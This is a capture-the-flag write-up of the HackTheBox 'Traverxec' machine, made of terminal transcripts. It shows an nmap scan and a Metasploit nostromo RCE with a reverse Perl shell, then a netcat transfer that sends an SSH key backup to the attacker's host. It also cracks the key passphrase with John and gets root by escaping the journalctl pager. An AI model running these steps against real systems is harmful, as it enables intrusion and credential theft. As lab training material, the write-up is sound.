[*]
HackTheBox Traverxec write-up to learn getting root by solving this CTF machine. Lets see what all we learn till the root # shell. The machine has tags web and file miss-configuration and is an Easy machine on HTB platform.
The Initial NMAP scan reveals 2 ports open 22 and 80, on which we again run a comprehensive scan.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec] └─$ nmap -p- --min-rate=1000 -T5 10.10.10.165 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 23:29 IST Nmap scan report for traverxec.htb (10.10.10.165) Host is up (0.17s latency). Not shown: 65533 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 128.36 seconds ┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec] └─$ sudo nmap -p22,80 -sV -sC -A -O -oN traverxec traverxec.htb Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 23:35 IST Nmap scan report for traverxec.htb (10.10.10.165) Host is up (0.27s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) | ssh-hostkey: | 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA) | 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA) |_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519) 80/tcp open http nostromo 1.9.6 |_http-server-header: nostromo 1.9.6 |_http-title: TRAVERXEC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 5.1 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 345.11 ms 10.10.14.1 2 345.25 ms traverxec.htb (10.10.10.165) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.23 seconds
Evident from the scan that the machine is running nostromo HTTP Server 1.9.6 on port 80, a web page with title TRAVERXEC.
A little search with just name and version will reveal presence of RCE exploit that can be downloaded here .
However I got to metasploit which also has something when you search nostromo
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec] └─$ msfconsole [!] The following modules could not be loaded!.. [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go [!] Please see /home/abhinav/.msf4/logs/framework.log for details. ______________________________________________________________________________ | | | METASPLOIT CYBER MISSILE COMMAND V5 | |______________________________________________________________________________| / / . / / x / / / + / + / / * / / / . / X / / X / ### / # % # / ### . / . / . * . / * + * ^ #### __ __ __ ####### __ __ __ #### #### / / / ########### / / / #### ################################################################################ ################################################################################ # WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF # ################################################################################ https://metasploit.com =[ metasploit v6.0.53-dev ] + -- --=[ 2149 exploits - 1143 auxiliary - 366 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 8 evasion ] Metasploit tip: View missing module options with show missing msf6 > search nostromo Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/nostromo_code_exec 2019-10-20 good Yes Nostromo Directory Traversal Remote Command Execution Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nostromo_code_exec msf6 > use 0 [*] Using configured payload cmd/unix/reverse_perl msf6 exploit(multi/http/nostromo_code_exec) > show options Module options (exploit/multi/http/nostromo_code_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (cmd/unix/reverse_perl): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic (Unix In-Memory) msf6 exploit(multi/http/nostromo_code_exec) > set rhosts traverxec.htb rhosts => traverxec.htb msf6 exploit(multi/http/nostromo_code_exec) > set lhost tun0 lhost => 10.10.14.8 msf6 exploit(multi/http/nostromo_code_exec) > set lport 7777 lport => 7777 msf6 exploit(multi/http/nostromo_code_exec) > show options Module options (exploit/multi/http/nostromo_code_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS traverxec.htb yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (cmd/unix/reverse_perl): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.14.8 yes The listen address (an interface may be specified) LPORT 7777 yes The listen port Exploit target: Id Name -- ---- 0 Automatic (Unix In-Memory) msf6 exploit(multi/http/nostromo_code_exec) >
Lets run the above exploit now to see magic and also get a TTY shell.
msf6 exploit(multi/http/nostromo_code_exec) > run [*] Started reverse TCP handler on 10.10.14.8:7777 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [*] Configuring Automatic (Unix In-Memory) target [*] Sending cmd/unix/reverse_perl command payload [*] Command shell session 2 opened (10.10.14.8:7777 -> 10.10.10.165:44536) at 2021-07-28 00:38:33 +0530 id uid=33(www-data) gid=33(www-data) groups=33(www-data) python -c'import pty;pty.spawn("/bin/bash")' www-data@traverxec:/usr/bin$
Lets find more, do some enumeration.
www-data@traverxec:/usr/bin$ awk -F: '($3>=1000)&&($1!="nobody"){print $1}' /etc/passwd
< '($3>=1000)&&($1!="nobody"){print $1}' /etc/passwd
david
www-data@traverxec:/usr/bin$
Further we can see few more information at /var/nostromo which contains the config file as nhttpd.conf, saying more about username and file which contains password.
www-data@traverxec:/usr/bin$ cd /var cd /var www-data@traverxec:/var$ ls ls backups cache lib local lock log mail nostromo opt run spool tmp www-data@traverxec:/var$ cd nostromo cd nostromo www-data@traverxec:/var/nostromo$ ls ls conf htdocs icons logs www-data@traverxec:/var/nostromo$ cd conf cd conf www-data@traverxec:/var/nostromo/conf$ ls ls mimes nhttpd.conf www-data@traverxec:/var/nostromo/conf$ cat nhttpd.confg cat nhttpd.confg cat: nhttpd.confg: No such file or directory www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf cat nhttpd.conf # MAIN [MANDATORY] servername traverxec.htb serverlisten * serveradmin david@traverxec.htb serverroot /var/nostromo servermimes conf/mimes docroot /var/nostromo/htdocs docindex index.html # LOGS [OPTIONAL] logpid logs/nhttpd.pid # SETUID [RECOMMENDED] user www-data # BASIC AUTHENTICATION [OPTIONAL] htaccess .htaccess htpasswd /var/nostromo/conf/.htpasswd # ALIASES [OPTIONAL] /icons /var/nostromo/icons # HOMEDIRS [OPTIONAL] homedirs /home homedirs_public public_www www-data@traverxec:/var/nostromo/conf$
www-data@traverxec:/var/nostromo/conf$ cat /var/nostromo/conf/.htpasswd cat /var/nostromo/conf/.htpasswd david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/ www-data@traverxec:/var/nostromo/conf$
The nhttpd.conf file contains some more information about the home directory section. Lets fine more into these directories.
# HOMEDIRS [OPTIONAL] homedirs /home homedirs_public public_www
The files under home are not read simply but public_www is readable.
# HOMEDIRS [OPTIONAL] homedirs /home homedirs_public public_www www-data@traverxec:/var/nostromo/conf$ ls -la /home ls -la /home total 12 drwxr-xr-x 3 root root 4096 Oct 25 2019 . drwxr-xr-x 18 root root 4096 Oct 25 2019 .. drwx--x--x 5 david david 4096 Oct 25 2019 david www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/ ls -la /home/david/ ls: cannot open directory '/home/david/': Permission denied www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/public_www ls -la /home/david/public_www total 16 drwxr-xr-x 3 david david 4096 Oct 25 2019 . drwx--x--x 5 david david 4096 Oct 25 2019 .. -rw-r--r-- 1 david david 402 Oct 25 2019 index.html drwxr-xr-x 2 david david 4096 Oct 25 2019 protected-file-area www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/public_www/protected-file-area <$ ls -la /home/david/public_www/protected-file-area total 16 drwxr-xr-x 2 david david 4096 Oct 25 2019 . drwxr-xr-x 3 david david 4096 Oct 25 2019 .. -rw-r--r-- 1 david david 45 Oct 25 2019 .htaccess -rw-r--r-- 1 david david 1915 Oct 25 2019 backup-ssh-identity-files.tgz www-data@traverxec:/var/nostromo/conf$
get the file via netcat
www-data@traverxec:/var/nostromo/conf$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@traverxec:/var/nostromo/conf$ nc 10.10.14.8 9876 < /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz <w/protected-file-area/backup-ssh-identity-files.tgz
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec] └─$ nc -lvp 9876 > backup.tgz listening on [any] 9876 ... connect to [10.10.14.8] from traverxec.htb [10.10.10.165] 60010
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec] └─$ tar -xvf backup.tgz 2 ⨯ home/david/.ssh/ home/david/.ssh/authorized_keys home/david/.ssh/id_rsa home/david/.ssh/id_rsa.pub
We have a key, which can be potentially for the david user. Let’s try.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec] └─$ sudo chmod 400 id_rsa
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec] └─$ ssh -i id_rsa david@traverxec.htb 127 ⨯ The authenticity of host 'traverxec.htb (10.10.10.165)' can't be established. ECDSA key fingerprint is SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
And that is asking a password, we will have to try more to get there, let’s get the hash from id_rsa and crack using john.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec] └─$ python /usr/share/john/ssh2john.py id_rsa > hash2.txt 1 ⨯ ┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec] └─$ john --wordlist=../rockyou.txt hash2.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status hunter (id_rsa) Warning: Only 2 candidates left, minimum 4 needed for performance. 1g 0:00:00:13 DONE (2021-07-28 01:24) 0.07183g/s 1030Kp/s 1030Kc/s 1030KC/sa6_123..*7¡Vamos! Session completed ┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec] └─$ john --show hash2.txt id_rsa:hunter 1 password hash cracked, 0 left ┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec] └─$
Enter the passphrase hunter on the ssh to david @ traverxec.htb and we are in.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec] └─$ ssh -i id_rsa david@traverxec.htb 255 ⨯ Enter passphrase for key 'id_rsa': Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 david@traverxec:~$
We are at a sweet spot now, grab the user flag from user.txt .
david@traverxec:~$ ls bin public_www user.txt david@traverxec:~$ cat user.txt 7db0b48469606a42cec20750d9782f3d david@traverxec:~$
Privilege Escalation
We see interesting entry/file in david’s home with following content.
david@traverxec:~$ ls bin public_www user.txt david@traverxec:~$ cd bin david@traverxec:~/bin$ ls server-stats.head server-stats.sh david@traverxec:~/bin$ cat server-stats.sh #!/bin/bash cat /home/david/bin/server-stats.head echo "Load: `/usr/bin/uptime`" echo " " echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`" echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`" echo " " echo "Last 5 journal log lines:" /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat david@traverxec:~/bin$
The last line of the script executes journalctl with sudo, interesting, let’s execute and see.
david@traverxec:~/bin$ ./server-stats.sh .----. .---------. | == | Webserver Statistics and Data |.-"""""-.| |----| Collection Script || || | == | (c) David, 2019 || || |----| |'-.....-'| |::::| '"")---(""' |___.| /:::::::::::" " /:::=======::: jgs '"""""""""""""' Load: 16:06:03 up 2:14, 1 user, load average: 0.00, 0.00, 0.00 Open nhttpd sockets: 0 Files in the docroot: 117 Last 5 journal log lines: -- Logs begin at Tue 2021-07-27 13:51:42 EDT, end at Tue 2021-07-27 16:06:03 EDT. -- Jul 27 13:51:44 traverxec systemd[1]: Starting nostromo nhttpd server... Jul 27 13:51:44 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after start: No such file or directory Jul 27 13:51:44 traverxec nhttpd[420]: started Jul 27 13:51:44 traverxec nhttpd[420]: max. file descriptors = 1040 (cur) / 1040 (max) Jul 27 13:51:44 traverxec systemd[1]: Started nostromo nhttpd server. david@traverxec:~/bin$
We move to gtfobins to see anything interesting related to journalctl and find we have.
Interestingly journalctl is invokes default pager, which is less, less waits for user input after displaying output, and can be exploited.
Let us execute – /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service [ DONT EXECUTE WHEN TERMINAL IS MAXIMIZED, Make Terminal Window Small]
just when we execute this, the less is waiting for input where we enter – !/bin/bash , voila ! we have a root shell.
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service -- Logs begin at Tue 2021-07-27 13:51:42 EDT, end at Tue 2021-07-27 16:41:32 EDT Jul 27 13:51:44 traverxec systemd[1]: Starting nostromo nhttpd server... Jul 27 13:51:44 traverxec systemd[1]: nostromo.service: Can't open PID file /var Jul 27 13:51:44 traverxec nhttpd[420]: started Jul 27 13:51:44 traverxec nhttpd[420]: max. file descriptors = 1040 (cur) / 1040 Jul 27 13:51:44 traverxec systemd[1]: Started nostromo nhttpd server. lines 1-6/6 (END)
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service -- Logs begin at Tue 2021-07-27 13:51:42 EDT, end at Tue 2021-07-27 16:41:32 EDT Jul 27 13:51:44 traverxec systemd[1]: Starting nostromo nhttpd server... Jul 27 13:51:44 traverxec systemd[1]: nostromo.service: Can't open PID file /var Jul 27 13:51:44 traverxec nhttpd[420]: started Jul 27 13:51:44 traverxec nhttpd[420]: max. file descriptors = 1040 (cur) / 1040 Jul 27 13:51:44 traverxec systemd[1]: Started nostromo nhttpd server. !/bin/bash root@traverxec:/home/david/bin#
Root Flag.
root@traverxec:/home/david/bin# cd /root root@traverxec:~# ls nostromo_1.9.6-1.deb root.txt root@traverxec:~# cat root.txt 9aa36a6d76f785dfd320a478f6e0d906 root@traverxec:~#
Exploitation completed, Flags found, What we learnt so far
– be versed with netcat, listening , getting files
– enumeration is the key.
– nmap to see open ports
– metasploit and exploit_db database to search any exploits, or searchsploit
– spawn TTY Shells where possible
– searching well for known services, reading documentations ( here nostoromo )
– never ignore the ssh keys , id_rsa
– getting the password from encrypted id_rsa (ssh2john )
– using john / online resources to crack/search the hashes
– privilege escalation via journalctl/less to root
